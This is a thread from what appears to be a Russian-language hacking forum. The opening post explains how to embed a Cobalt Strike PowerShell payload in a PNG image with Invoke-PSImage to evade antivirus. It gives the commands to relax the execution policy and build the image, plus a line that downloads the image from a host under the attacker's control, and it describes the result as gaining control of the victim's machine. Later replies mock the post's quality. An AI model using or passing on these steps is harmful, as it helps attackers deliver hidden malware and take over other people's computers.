• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья CobaltStrike — скрытие shellcode в изображениях для обхода антивируса

0x0021h

RAID-массив
Пользователь
Регистрация
14.11.2021
Сообщения
53
Решения
1
Реакции
78
Многие антивирусные программы не обнаруживают изображения. Принцип заключается в использовании данных полезной нагрузки для создания нового изображения или встраивании полезной нагрузки в младшие байты существующего изображения, чтобы оно выглядело как реальное изображение.

Изображения сохраняются в формате PNG и могут быть сжаты без потерь, что не повлияет на возможность выполнения полезной нагрузки, поскольку сами данные хранятся в цвете.

Обычные сценарии PowerShell обычно сжимаются при создании новых изображений, а размер их файлов составляет около 50 % от исходного сценария.


Сначала создайте файл ps1:
1647322962923.png


Поместите сгенерированный файл ps1 и файл Invoke-PSImage.ps1 в один и тот же каталог.


-> Tools: https://github.com/peewpw/Invoke-PSImage

1647323077388.png


Подготовьте обычный образ, который мы будем использовать для сборки с Payload.

Создайте образ, содержащий Payload:

> Выполните следующую команду в PowerShell:

Код:
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Import-Module .\Invoke-PSimage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\image.jpg -Out .\image.png -Web

Вы получите кучу кода Powershell и изображение с именем image.png.

Отредактируйте это изображение:
Bash:
((a Net.WebClient).OpenRead("http://192.168.1.101/image.png"));

Измените его на свой собственный url.

ОК, выполните выходную команду PowerShell, чтобы получить контроль над целевой машиной.

Вы должны видеть компьютер жертвы в CobaltStrike.
 
вроде не соответствует требованиям

Ну, пожалуйста, админ, удалите его или переместите в другой раздел, спасибо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Безымянный.png
 
Пожалуйста, обратите внимание, что пользователь заблокирован
author did not even show the outputs, the command screens and most importantly to bypass AV lol
He show you neo has joined)
 
автор походу про amsi, av, шеллкод, детект не читал ничего.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх